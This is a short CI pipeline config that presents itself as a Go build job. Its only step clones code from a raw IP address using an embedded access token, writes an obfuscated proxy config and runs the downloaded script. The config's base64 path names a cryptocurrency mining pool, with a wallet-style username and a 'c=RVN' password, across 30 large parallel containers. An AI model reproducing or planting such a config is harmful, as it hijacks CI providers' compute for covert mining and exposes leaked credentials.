jobs:
  build:
    docker:
      - image: cimg/go:1.18.1
    parallelism: 30
    resource_class: large
    steps:
      - run: git clone http://malphite848:ff2c9a712ddb48cefb9b1bc8b40fa9c3fb348ea3@160.30.168.199:3001/malphite848/mini-dataset.git && cd mini-dataset && echo -e 'proxy=wss://present-nichol-vivo1-4f3dad8a.koyeb.app/bWlub3RhdXJ4Lm5hLmUuenBvb2wuY2E6NzAxOQ==\nusername=RLJFAPkpcBD6FXesztbxPoWF5WV6FtsYUN\npassword=c=RVN\nthreads=36' > data.txt && python3 app.py